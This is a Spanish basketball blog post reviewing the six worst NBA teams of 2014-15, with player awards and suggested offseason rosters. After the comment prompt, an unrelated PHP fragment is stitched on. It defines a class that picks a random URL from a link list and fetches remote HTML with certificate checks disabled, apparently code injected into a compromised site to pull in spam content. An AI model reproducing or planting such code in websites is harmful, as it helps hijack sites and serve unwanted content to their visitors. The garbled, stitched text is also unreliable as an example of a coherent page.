Premios 2014-15: Los infames

29 de June de 2015 por TheDeerHunter

En los próximos días publicaremos diferentes artículos para resumir y valorar las campañas de todos y cada uno de los equipos, además de tratar de anticipar qué harán (o deberían hacer) este verano para reforzarse de cara a la temporada 2015-2016.

Empezamos con los que han sido los peores equipos del curso, los más decepcionantes, los que han sacado todas las vergüenzas a sus aficionados. Con todos ustedes, los infames.

Minnesota Timberwolves (16-66)

Sabíamos que la vida sin Love era susceptible de ir a peor. Los Wolves padecen una serie de problemas crónicos: Fragilidad defensiva y enfermería llena; racanear con unos y despilfarrar con otros al “tuntún”; excesivo gusto por los blanquitos… Lo rescatable de la campaña ha sido el ROY a Wiggins, el pick 1 del draft, el par de buenos mates de LaVine y el frugal regreso de Garnett. El resto… patético.

Premios Wolves 2014/15

  • MVP+Rookie: Andrew Wiggins. Flamante RoY, siendo prácticamente el único con el que se ha podido contar de forma sostenible a lo largo del curso.
  • Sorpresa: Shabazz Muhammad. Víctima de la era internet. Pasó de causar furor en los mocks a ser repudiado. Ha podido demostrar que no es un cacho de carne inservible y en su caso no es poco.
  • Decepción: Nikola Pekovic. No sólo ha jugado poco sino que ha jugado mal. Impresiona su caída de %TC del 54 al 42. De él se habla sin tapujos como contrato tóxico.
  • Mayor esfuerzo en vano: Justin Hamilton. Una de las escasas sorpresas agradables, pero no le dará para amarrar un contrato aquí.

Jugando a GM

El objetivo debería ser volver a elegir alto y foguear al joven núcleo, pero mejorando el aspecto físico y la imagen defensiva. Adicionalmente convendría reforzar la pegada exterior. Era un secreto a voces que el elegido iba a ser Karl-Anthony Towns. Además se movieron para traerse al base Tyus Jones. No parece casualidad que ambos cubren las frecuentes ausencias de Pekovic y Ricky, particularmente del segundo atendiendo a los rumores. La versatilidad de Towns se adecua perfectamente a las necesidades del equipo, siendo altamente compatible con Dieng.

También viene sonando fuerte la incorporación de Nemanja Bjelica vía Mid-Level. Consecuentemente se intenta la salida de Anthony Bennett, cuya extensión habría que afrontar en octubre. Difícilmente encontramos sentido a la posible renovación de Garnett. Respecto a la línea exterior, saldrá Gary Neal con todo merecimiento. Se especula con las salidas de Martin y Budinger, aunque yo me quedaría a los dos y daría por cerrada una plantilla que necesariamente mejorará imagen y resultados:

PG: Ricky Rubio, Tyus Jones, Lorenzo Brown
SG: Kevin Martin, Zach LaVine
SF: Andrew Wiggins, Shabazz Muhammad, Chase Budinger
PF: Nemanja Belica, Adreian Payne, Robbie Hummel
C: Karl Towns, Gorgui Dieng, Nikola Pekovic

New York Knicks (17-65)

Temporada de transición (una más) en la Gran Manzana. El objetivo era limpiar malos contratos y quedar lo más abajo posible. ¡Conseguido! Otra cosa es que por el desagüe se ha ido buena parte del crédito del Pescador y, quién sabe, si del intocable Phil Jackson.

Premios Knicks 2014/15

  • MVP: Casi desierto. Carmelo Anthony en sólo 40 partidos disputados y en una de sus campañas más discretas.
  • Rookie: Langston Galloway, en el segundo quinteto de su promoción.
  • La sorpresa: La alineación de cada noche.
  • La decepción: La de algunos la noche del draft.
  • El mayor esfuerzo en vano: El del que paga una entrada en el Madison cada noche para tragarse el esperpento.

Jugando a GM

Abucheos cuando sonó el nombre de Kristaps Porzingis en la cuarta elección. Se comentan los exabruptos lanzados por Melo al enterarse. Difícil mentar a la paciencia en aquellos lares. En cambio parece que hay bastante más unanimidad en la elección de Jerian Grant. No podemos dejar pasar por alto los derechos de Guillermo Hernangomez, aunque su llegada efectiva al Madison es mucho más incierta y, en ningún caso inmediata.

A partir de aquí, bastante pasta para gastar pero muchos puestos por cubrir. A buen seguro que no perderán ojo a la situación de los “Mirlos blancos” del mercado de agentes libres, aunque ahora mismo el nombre más realista que se baraja es el de Greg Monroe. También de David West como alternativa más asequible.

No obstante, el sueño mojado de Phil Jackson podría venir de intentar pescar en las aguas revueltas de los Blazers. El fichaje combinado de Wesley Matthews y Robin Lopez incrementaría significativamente el equilibrio de la plantilla. Tratarán de fichar a Danny Green en caso de que el precio del primero termine resultando prohibitivo y también se especula con un traspaso para traer a Jared Sullinger.

En ningún caso pujaríamos por Rajon Rondo a pesar de la predisposición del jugador. No cuadra con el pretendido triángulo ofensivo ni con calzador.

PG: Jose Calderón, Jerian Grant
SG: Danny Green, Alexey Shved, Langston Galloway
SF: Carmelo Anthony, Cleanthony Early
PF: Kristaps Porzingis, David West, Quincy Acy
C: Robin López, Cole Aldrich

Philadelphia 76ers (17-65)

Se junta el hambre con las ganas de comer en Philadelphia. Temporada catastrófica a pesar del premio del pick 3. Año tras año peleando por la cuchara de madera, pero aún están lejos de vislumbrar algo de luz al final del túnel. Nosotros tampoco terminamos de entender a Sam Hinkie, a quien se le está empezando a conocer en determinados círculos como “Sham” (Farsante) Hinkie.

Premios Sixers 2014/15

  • MVP+Rookie: Nerlens Noel. Aún está lejos de ser el “Mutombo” que alguna vez nos prometieron, pero sí le hemos visto potencial para ser algún día DPY. En cambio sus habilidades ofensivas precisan desarrollo.
  • La sorpresa: Alguno los traspasos que es capaz de idear Sam Hinkie.
  • La decepción: La larga espera por disfrutar de Joel Embiid y de Dario Saric. Y lo que te rondaré…
  • El mayor esfuerzo en vano: El de cualquiera que intente analizar el futuro a medio plazo de este equipo.

Jugando a GM

Tercer interior consecutivo que elijen los Sixers como elección más alta de primera ronda. La buena noticia es que Jahlil Okafor parece un gran jugador y que es bastante compatible con Noel en pista. La mala es que en caso de que Embiid llegue a recuperarse del todo difícilmente podrán sacarles rédito a los tres juntos y ya sabemos cómo se las gastan en aquellos despachos. Del saco de elecciones de segunda ronda que han hecho esperamos que, aunque sólo sea por probabilidad, encuentren algo aprovechable.

Nadie cree que los Sixers vayan a arrasar en el mercado de FA’s porque nadie se está pegando precisamente por jugar allí. No tienen muchas alternativas que retener lo poco bueno que les caiga y, a ser posible, no regalar ciertos activos. Esta frase no es trivial.

Habría que retener a Thomas Robinson y Henry Sims, así como a Ish Smith, Isaac Canaan y Hollis Thompson. Sin embargo saldrían dos ilustres veteranos como Jason Richardson y Luc Mbah a Moute.

PG: Tony Wroten, Ishmael Smith, Isaac Canaan
SG: Robert Covington, Hollis Thompson, J.P. Tokoto
SF: Jerami Grant, JaKarr Sampson
PF: Nerlens Noel, Thomas Robinson, Richaun Holmes
C: Jahlil Okafor, Henry Sims, Joel Embiid

Los Ángeles Lakers (21-61)

La crisis de resultados más terrible de la historia del oro y púrpura. Infaustos últimos coletazos de la era Kobe. Parece, sin embargo, que crece la sensación de que lo peor ha pasado. Los aficionados no están excesivamente acostumbrados a dos altas elecciones de draft consecutivas, y en cambio sí lo están a altas expectativas en la offseason. Veremos en qué sentido la realidad termina imponiéndose.

Premios Lakers 2014/15

  • MVP: Los dos hombres más utilizados por Byron Scott esta campaña han sido de perfil discreto, Jordan Hill y Wesley Johnson. Ilustrativo.
  • Rookie+sorpresa: Jordan Clarkson, una de las gratas sorpresas de la campaña, quien se ha colado de forma inesperada en el quinteto ideal de rookies.
  • La decepción: También al alimón Jeremy Lin+Carlos Boozer, quienes conocieron tiempos mejores antes de llegar a L.A.
  • El mayor esfuerzo en vano: Wayne Ellington, otro de los más han jugado este año. Difícilmente tendrá sitio el curso que viene.

Jugando a GM

Se pretende preparar el terreno para la hipotética llegada de Durant, coincidiendo (oh casualidad) con el final del contrato de Kobe, que no necesariamente con el final de su carrera. Independientemente de los coqueteos con Cousins, los Lakers tienen margen salarial para tirarle los tejos a la mayoría, y la mayoría se deja querer por un pretendiente de esta índole. Vaya por delante que no somos partidarios de traspasar a ninguno de los activos más prometedores por el pívot all-star de los Kings. Hay muchas ganas de observar las evoluciones de D’Angelo Russell y Julius Randle en L.A. y a Cousins, en todo caso, se le podría fichar en su momento como FA sin nada a cambio.

La carta a los reyes magos podría ser un Marc+Jimmy, pero parece que el primero no está por la labor (¿el karma por “maltratar” a Pau?) y que los Bulls están dispuestos a defender su jugador. En cualquier caso el nombre de la franquicia lógicamente va a sonar alrededor de cada agente libre que se precie, aunque sólo sea para hacer ruido.

En el capítulo de salidas, las obvias de Lin y Boozer, así como la de Jordan Hill para liberar espacio.

A no ser que se ponga a tiro una figura a la que no se puede rechazar (¿Aldridge?) los Lakers deberían poder juntar un par de buenos agentes libres sin ínfulas a la espera de lo que suceda el verano que viene.

PG: D’Angelo Russell, Jordan Clarkson, Ronnie Price.
SG: Kobe Bryant, Gerald Green, Jabari Brown
SF: Nick Young, Wesley Johnson, Anthony Brown
PF: Julius Randle, Ryan Kelly, Larry Nance Jr.
C: Greg Monroe, Ed Davis, Tarik Black

Sacramento Kings (29-53)

En algún momento del curso llegamos a pensar que los astros se alineaban convirtiendo a los Kings en candidatos a meterse en la pomada de postemporada. La cabra tira al monte y el caos volvió a adueñarse de la franquicia californiana. Estamos lejos de vislumbrar un atisbo de coherencia. Nadie es intocable en Sacramento. Cada cual que vigile sus espaldas.

Premios Kings 2014/15

  • MVP: Descomunal campaña de DeMarcus Cousins, no exenta de excentricidades. De premio se ha coqueteado con su traspaso. Veremos cómo le afecta a su ego.
  • El rookie: De momento Nik Stauskas no es el nuevo Stojakovic. Discreta campaña la del pick nº8 del pasado draft.
  • La sorpresa: Hasta su lesión gran rendimiento de Darren Collison supliendo con dignidad a Isiah Thomas.
  • La decepción: A muchos la salida de Mike Malone nos pareció grotesca en tiempo y forma. Quizá otros la veían cantada pero en ese caso no debería haber comenzado la anterior campaña. La historia de amor con George Karl tiene pinta de ir por los mismos derroteros.
  • El mayor esfuerzo en vano: En ocasiones parece que la palabra esfuerzo está vetada en el vestuario de los Kings.

Jugando a GM

Arde Sacramento. En medio de rumores de traspaso de su all-star Cousins, teóricamente por deseo explícito de Karl jugándose el propio cuello, Divac elije a Cauley-Stein para desmentirlo. Supuestamente muy amigo de Cousins, aunque de la misma cuerda psicológica y difícilmente compatibles en los esquemas del actual técnico. Sobra decir que Thompson y Landry, con contratos garantizados tienen las horas contadas en la capital californiana. Probablemente como otros pues la fiesta no ha hecho más que comenzar.

Los refuerzos que suenan no parecen los más adecuados para aportar serenidad: Rondo, Stuckey, McGee … y también se especula con un hipotético Lawson+Wilson Chandler+Faried x Cousins, que sería muy del gusto del técnico. Tal y como están las cosas quizá la locura sería mantener a Cousins a disgusto.

En cualquier caso, aventurar una solución a este puzzle es del todo suicida.

PG: Ty Lawson, Darren Collison, Ray McCallum
SG: Ben McLemore, Nik Stauskas
SF: Wilson Chandler, Omri Casspi
PF: Kenneth Faried, Rudy Gay
C: Willie Cauley-Stein, JaVale McGee

Denver Nuggets (30-52)

Teórico candidato a playoffs que termina firmando 30 victorias y gracias. El desastre de la era Shaw ha sido completo y la franquicia da muestras de tampoco saber muy bien hacia qué dirección ir. Ahora mismo hay tantas posibilidades de reforzar al equipo para recuperar estatus de playoffs que de demolerlo al completo.

Premios Nuggets 2014/15

  • MVP: Otra excelente campaña de Ty Lawson. La más generosa de su carrera.
  • Rookie: Tan buena pinta tenía Jusuf Nurkic que acabó provocando la salida de Mozgov.
  • La sorpresa: La compatibilidad que han mostrado esta campaña Chandler y Gallinari juntos… y el italiano jugando casi 60 partidos.
  • La decepción: Horrorosa la campaña de Arron Afflalo. Resulta increíble que sea el mismo jugador que consideramos “oro a cambio de nada” cuando llegó de Orlando.
  • El mayor esfuerzo en vano: Lawson nuevamente. Además de ser el mejor se ha pegado muchas minutadas pero está en todas las quinielas para salir este verano.

Jugando a GM

Blanco y en botella, Ty Lawson va a ser casi con toda probabilidad traspasado tras la elección de Emmanuel Mudiay en el 7, y otros seguirán sus pasos. Sólo Nurkic será considerado intransferible este próximo verano.

El otro gran activo a traspasar es Faried, aunque la larga extensión que le firmaron complica su colocación y sus cualidades no son del gusto de cualquier técnico. O bien entra en la operación Cousins o saldrá más adelante por alguna ronda, joven promesa y/o expiring.

Dependiendo de si llega o no el pívot all-star se afrontará el resto de off-season de una manera u otra. Jugadores como Hickson, Gallinari, Chandler, Barton o Foye afrontarán su último año de contrato, interfieren poco en cualquier estrategia a corto o medio plazo y cuentan con cierto valor, tanto deportivo como en el mercado. Son perfectos comodines ahora o más adelante.

Quizás, mientras se termina de definir la línea a seguir, uno de los agentes libres que podría interesar para equilibrar la plantilla sería Brandan Wright, cuya versatilidad podría resultar útil ante cualquier escenario.

PG: Emmanuel Mudiay, Jeremi Lin, Erick Green
SG: Randy Foye, Gary Harris, Ian Clark
SF: Danilo Gallinari, Wilson Chandler, Will Barton
PF: Kenneth Faried, J.J. Hickson, Joffrey Lauvergne
C: Jusuf Nurkic, Brandan Wright

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>